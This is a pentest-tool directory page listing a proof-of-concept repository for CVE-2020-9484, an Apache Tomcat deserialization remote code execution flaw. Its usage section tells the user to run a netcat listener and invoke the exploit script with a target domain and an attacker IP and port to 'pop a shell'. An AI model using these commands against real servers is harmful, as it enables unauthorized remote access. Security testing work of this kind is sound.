Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-9484 — POC for CVE-2020-9484 | Kitploit
Tools/GitHubGitHub/vicxor/cve-2020-9484
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubvicxor/cve-2020-9484

CVE-2020-9484

POC for CVE-2020-9484

View Repository
1315 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-9484

POC for CVE-2020-9484

Logo

POC for CVE-2020-9484

Apache Tomcat RCE by deserialization (CVE-2020-9484)
Explore the docs »

Getting Started

1. Clone this repository, then you will be able to use CVE-2020-9484 and modify the source code if needed.
2. Download ysoserial jar
3. place both CVE-2020-9484 and ysoserial.jar in the same directory
4. pop a shell!

Usage

A simple bash script has been written in order to streamline the usage of CVE-2020-9484.
Upon Exploitation you will need to have a netcat listener ready

root@kitploit:~
nc -lvnp $port
root@kitploit:~
./CVE-2020-9484.sh domain attacker-ip attacker-port

CVE-2020-9484

Download Tool